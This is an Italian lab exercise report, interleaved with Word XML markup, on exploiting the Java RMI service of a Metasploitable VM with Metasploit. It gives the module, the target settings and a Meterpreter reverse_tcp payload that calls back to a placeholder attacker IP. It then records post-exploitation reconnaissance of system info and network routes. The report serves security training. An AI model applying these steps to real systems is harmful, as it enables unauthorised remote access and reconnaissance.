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djl14xs0h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Resoconto Esercizio: Metasploitable Java RMI Exploitation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ecnvovbwfqp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Verifica della connessione tra le due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Azione</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Utilizzo del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dalla macchina attaccante per controllare la raggiungibilità della macchina attaccata.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&lt;IP_MACCHINA_ATTACCATA&gt;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Risultato</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: I pacchetti ICMP sono stati ricevuti con successo, confermando la connessione tra le due macchine.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5rcw1yq6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Individuare e caricare la vulnerabilità Java RMI in Metasploit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Azione 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Avvio del framework Metasploit.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msfconsole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Azione 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ricerca del modulo per la vulnerabilità Java RMI.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 java_rmi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Modulo selezionato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exploit/multi/misc/java_rmi_server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Azione 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configurazione del modulo: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Impostazione del target con il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RHOST &lt;IP_MACCHINA_ATTACCATA&gt;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Definizione della porta con il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RPORT &lt;PORTA_RMI&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (di default 1099).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Configurazione del payload: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PAYLOAD java/meterpreter/reverse_tcp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LHOST &lt;IP_MACCHINA_ATTACCANTE&gt;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LPORT &lt;PORTA_ATTACCANTE&gt;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Azione 4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Avvio dell'exploit.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exploit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Risultato</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Accesso riuscito con Meterpreter nella macchina attaccata.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wths8f7wc3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Raccolta informazioni sulla macchina attaccata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Azione 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ottenere informazioni sul sistema operativo della macchina compromessa.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sysinfo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Versione del sistema operativo, architettura e dettagli del kernel.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Azione 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Recupero delle configurazioni di rete e tabelle di routing.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Visualizzazione configurazioni di rete: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Risultato</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ottenute le interfacce di rete e gli indirizzi IP.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Estrazione delle tabelle di routing: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Risultato</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Estratti i percorsi di rete attivi.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Azione 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Creazione di screenshot per documentare le configurazioni.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screenshot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Screenshot salvati della macchina attaccata, documentando interfacce di rete e tabelle di routing.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